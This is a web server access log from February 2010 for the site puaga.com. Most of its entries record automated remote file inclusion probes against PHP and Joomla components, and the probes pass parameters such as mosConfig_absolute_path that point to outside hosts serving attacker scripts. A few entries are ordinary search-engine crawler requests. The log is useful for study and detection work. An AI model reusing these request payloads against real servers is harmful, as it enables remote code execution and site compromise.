72.13.93.215 - - [15/Feb/2010:10:11:07 -0800] "GET /logs/access_100123.log////index.php?option=com_frontpage&Itemid=1/index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://yestour.net/pass/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
72.13.93.215 - - [15/Feb/2010:10:11:08 -0800] "GET ///index.php?option=com_frontpage&Itemid=1/index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://yestour.net/pass/id.txt? HTTP/1.1" 200 3642 "-" "libwww-perl/5.808" "www.puaga.com"
72.13.93.215 - - [15/Feb/2010:10:11:08 -0800] "GET /logs////index.php?option=com_frontpage&Itemid=1/index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://yestour.net/pass/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:10:11:09 -0800] "GET /logs/access_100109.log%20%20///comment_modify.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:10:11:09 -0800] "GET /logs///comment_modify.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:10:11:09 -0800] "GET //comment_modify.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.7.235.75 - - [15/Feb/2010:10:12:18 -0800] "GET /logs/access_100119.log//skin/zero_vote/error.php?dir=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
125.141.91.138 - - [15/Feb/2010:10:12:20 -0800] "GET /logs//com_moofaq/includes/file_includer.php?gzip=0&file=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.146.200 - - [15/Feb/2010:10:12:30 -0800] "GET /logs/access_100123.log/components/com_rssfactory/pseudorefresh.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
72.55.146.200 - - [15/Feb/2010:10:12:30 -0800] "GET /components/com_rssfactory/pseudorefresh.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
72.55.146.200 - - [15/Feb/2010:10:12:30 -0800] "GET /logs/components/com_rssfactory/pseudorefresh.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
200.219.195.66 - - [15/Feb/2010:10:12:44 -0800] "GET /logs/access_100125.log%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.219.195.66 - - [15/Feb/2010:10:12:44 -0800] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.219.195.66 - - [15/Feb/2010:10:12:44 -0800] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [15/Feb/2010:10:12:55 -0800] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [15/Feb/2010:10:12:55 -0800] "GET /logs/access_100125.log%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [15/Feb/2010:10:12:55 -0800] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [15/Feb/2010:10:12:56 -0800] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [15/Feb/2010:10:12:56 -0800] "GET /logs/access_100125.log%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [15/Feb/2010:10:12:56 -0800] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [15/Feb/2010:10:13:43 -0800] "GET /logs/access_100208.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [15/Feb/2010:10:13:43 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [15/Feb/2010:10:13:43 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:10:13:47 -0800] "GET /logs/access_100130.log%20%20///comment_modify.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [15/Feb/2010:10:13:52 -0800] "GET /logs/access_100109.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.82.114.113 - - [15/Feb/2010:10:14:13 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.82.114.113 - - [15/Feb/2010:10:14:13 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.82.114.113 - - [15/Feb/2010:10:14:13 -0800] "GET /logs/access_100208.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [15/Feb/2010:10:14:22 -0800] "GET /logs//com_moofaq/includes/file_includer.php?gzip=0&file=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [15/Feb/2010:10:14:22 -0800] "GET /com_moofaq/includes/file_includer.php?gzip=0&file=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.82.114.113 - - [15/Feb/2010:10:14:24 -0800] "GET /logs/access_100109.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [15/Feb/2010:10:14:26 -0800] "GET /logs//com_moofaq/includes/file_includer.php?gzip=0&file=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [15/Feb/2010:10:14:27 -0800] "GET /com_moofaq/includes/file_includer.php?gzip=0&file=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [15/Feb/2010:10:14:27 -0800] "GET /logs/access.log//com_moofaq/includes/file_includer.php?gzip=0&file=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [15/Feb/2010:10:14:28 -0800] "GET /logs/access.log//com_moofaq/includes/file_includer.php?gzip=0&file=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [15/Feb/2010:10:14:36 -0800] "GET /logs/access_100111.log%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [15/Feb/2010:10:14:37 -0800] "GET /logs/access_100111.log%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [15/Feb/2010:10:14:45 -0800] "GET /logs/access_100125.log%20%20//com_moofaq/includes/file_includer.php?gzip=0&file=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:10:15:21 -0800] "GET /logs/access_100130.log%20%20///comment_modify.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [15/Feb/2010:10:15:28 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [15/Feb/2010:10:15:28 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [15/Feb/2010:10:15:28 -0800] "GET /logs/access_100203.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [15/Feb/2010:10:15:33 -0800] "GET /logs/access_100208.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [15/Feb/2010:10:15:40 -0800] "GET /logs/access_100114.log%20%20/modules/My_eGallery/public/displayCategory.php?adminpath=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [15/Feb/2010:10:15:40 -0800] "GET /logs/modules/My_eGallery/public/displayCategory.php?adminpath=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [15/Feb/2010:10:15:40 -0800] "GET /modules/My_eGallery/public/displayCategory.php?adminpath=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.38.160.77 - - [15/Feb/2010:10:15:55 -0800] "GET /logs/components/com_rssfactory/pseudorefresh.php?mosConfig_absolute_path=http://zoaweb.cl/profesional/id.txt???%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
84.38.160.77 - - [15/Feb/2010:10:15:55 -0800] "GET /logs/access_100123.log/components/com_rssfactory/pseudorefresh.php?mosConfig_absolute_path=http://zoaweb.cl/profesional/id.txt???%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
84.38.160.77 - - [15/Feb/2010:10:15:55 -0800] "GET /components/com_rssfactory/pseudorefresh.php?mosConfig_absolute_path=http://zoaweb.cl/profesional/id.txt???%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
200.219.195.66 - - [15/Feb/2010:10:16:27 -0800] "GET /logs/access_100114.log%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [15/Feb/2010:10:16:37 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [15/Feb/2010:10:16:37 -0800] "GET /logs/access_100203.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [15/Feb/2010:10:16:37 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [15/Feb/2010:10:16:56 -0800] "GET /logs/access_100208.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.38.160.77 - - [15/Feb/2010:10:17:00 -0800] "GET /logs/access_100125.log/components/com_rssfactory/pseudorefresh.php?mosConfig_absolute_path=http://zoaweb.cl/profesional/id.txt???%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
61.7.235.75 - - [15/Feb/2010:10:18:29 -0800] "GET /logs/access_100119.log/bbs/skin/zero_vote/error.php?dir=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
83.167.62.166 - - [15/Feb/2010:10:19:06 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; Exabot/3.0 (BiggerBetter); +http://www.exabot.com/go/robot)" "puaga.com"
83.167.62.166 - - [15/Feb/2010:10:19:06 -0800] "GET /pictures/p5 HTTP/1.1" 301 92 "-" "Mozilla/5.0 (compatible; Exabot/3.0 (BiggerBetter); +http://www.exabot.com/go/robot)" "puaga.com"
83.167.62.166 - - [15/Feb/2010:10:19:08 -0800] "GET /pictures/p9 HTTP/1.1" 301 92 "-" "Mozilla/5.0 (compatible; Exabot/3.0 (BiggerBetter); +http://www.exabot.com/go/robot)" "puaga.com"
83.167.62.166 - - [15/Feb/2010:10:19:11 -0800] "GET /pictures/p8 HTTP/1.1" 301 92 "-" "Mozilla/5.0 (compatible; Exabot/3.0 (BiggerBetter); +http://www.exabot.com/go/robot)" "puaga.com"
83.167.62.166 - - [15/Feb/2010:10:19:15 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; Exabot/3.0 (BiggerBetter); +http://www.exabot.com/go/robot)" "www.puaga.com"
83.167.62.166 - - [15/Feb/2010:10:19:15 -0800] "GET /pictures/p6 HTTP/1.1" 301 96 "-" "Mozilla/5.0 (compatible; Exabot/3.0 (BiggerBetter); +http://www.exabot.com/go/robot)" "www.puaga.com"
118.82.114.113 - - [15/Feb/2010:10:20:32 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [15/Feb/2010:10:21:16 -0800] "GET /logs//com_moofaq/includes/file_includer.php?gzip=0&file=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [15/Feb/2010:10:21:16 -0800] "GET /com_moofaq/includes/file_includer.php?gzip=0&file=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [15/Feb/2010:10:21:20 -0800] "GET /logs/access.log//com_moofaq/includes/file_includer.php?gzip=0&file=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [15/Feb/2010:10:22:30 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [15/Feb/2010:10:22:30 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [15/Feb/2010:10:22:30 -0800] "GET /logs/access_100117.log%20%20/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [15/Feb/2010:10:22:34 -0800] "GET /logs/access_100202.log//skin/mail.inc.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [15/Feb/2010:10:22:34 -0800] "GET /logs//skin/mail.inc.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [15/Feb/2010:10:22:34 -0800] "GET /skin/mail.inc.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.174.65.27 - - [15/Feb/2010:10:23:25 -0800] "GET /logs/access_100114.log/modules/Neos_Chronos/header.php?base_folder=http://www.eywestco.co.kr/upfiles/README.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
81.174.65.27 - - [15/Feb/2010:10:23:26 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.eywestco.co.kr/upfiles/README.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
87.250.252.242 - - [15/Feb/2010:10:24:29 -0800] "GET / HTTP/1.1" 302 2624 "-" "Yandex/1.01.001 (compatible; Win16; I)" "akifbar.puaga.com"
75.125.186.154 - - [15/Feb/2010:10:24:31 -0800] "GET /logs/access_100107.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [15/Feb/2010:10:24:45 -0800] "GET /logs/access_100127.log//skin/mail.inc.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [15/Feb/2010:10:24:47 -0800] "GET /logs/access_100203.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.228.45.47 - - [15/Feb/2010:10:25:31 -0800] "GET /login.php?dir=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.228.45.47 - - [15/Feb/2010:10:25:31 -0800] "GET /logs/access_100201.log//login.php?dir=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.228.45.47 - - [15/Feb/2010:10:25:31 -0800] "GET /logs//login.php?dir=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.228.45.47 - - [15/Feb/2010:10:25:59 -0800] "GET /login.php?dir=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.228.45.47 - - [15/Feb/2010:10:25:59 -0800] "GET /logs/access_100201.log%20%20//login.php?dir=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [15/Feb/2010:10:26:20 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [15/Feb/2010:10:26:20 -0800] "GET /logs/access_100117.log%20%20/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [15/Feb/2010:10:26:20 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.111.172 - - [15/Feb/2010:10:26:29 -0800] "GET /logs/access_100211.log HTTP/1.0" 200 1827270 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
72.13.93.215 - - [15/Feb/2010:10:26:35 -0800] "GET /logs/access_100208.log////index.php?option=com_frontpage&Itemid=1/index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://yestour.net/pass/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
195.228.45.47 - - [15/Feb/2010:10:26:47 -0800] "GET /logs/access_100201.log//login.php?dir=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.228.45.47 - - [15/Feb/2010:10:26:51 -0800] "GET /logs/access_100112.log//login.php?dir=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.228.45.47 - - [15/Feb/2010:10:26:57 -0800] "GET /login.php?dir=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.228.45.47 - - [15/Feb/2010:10:26:57 -0800] "GET /logs//login.php?dir=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.228.45.47 - - [15/Feb/2010:10:26:59 -0800] "GET /logs/access_100112.log%20%20//login.php?dir=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.13.93.215 - - [15/Feb/2010:10:27:23 -0800] "GET /logs/access_100208.log////index.php?option=com_frontpage&Itemid=1/index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://yestour.net/pass/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
82.151.132.176 - - [15/Feb/2010:10:27:25 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [15/Feb/2010:10:27:25 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [15/Feb/2010:10:27:25 -0800] "GET /logs/access_100201.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [15/Feb/2010:10:27:38 -0800] "GET /logs/access_100107.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.228.45.47 - - [15/Feb/2010:10:27:47 -0800] "GET /logs/access_100112.log//login.php?dir=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.249.103.31 - - [15/Feb/2010:10:28:11 -0800] "GET /logs/access_100103.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.249.103.31 - - [15/Feb/2010:10:28:11 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.249.103.31 - - [15/Feb/2010:10:28:11 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.249.103.31 - - [15/Feb/2010:10:28:39 -0800] "GET /logs/access_100103.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.249.103.31 - - [15/Feb/2010:10:28:39 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [15/Feb/2010:10:29:14 -0800] "GET /logs/access_100112.log///write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [15/Feb/2010:10:29:14 -0800] "GET /logs///write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [15/Feb/2010:10:29:14 -0800] "GET //write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [15/Feb/2010:10:29:19 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [15/Feb/2010:10:29:30 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [15/Feb/2010:10:29:30 -0800] "GET /logs/access_100201.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [15/Feb/2010:10:29:34 -0800] "GET /logs/access_100116.log//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [15/Feb/2010:10:29:34 -0800] "GET /errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [15/Feb/2010:10:29:34 -0800] "GET /logs//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
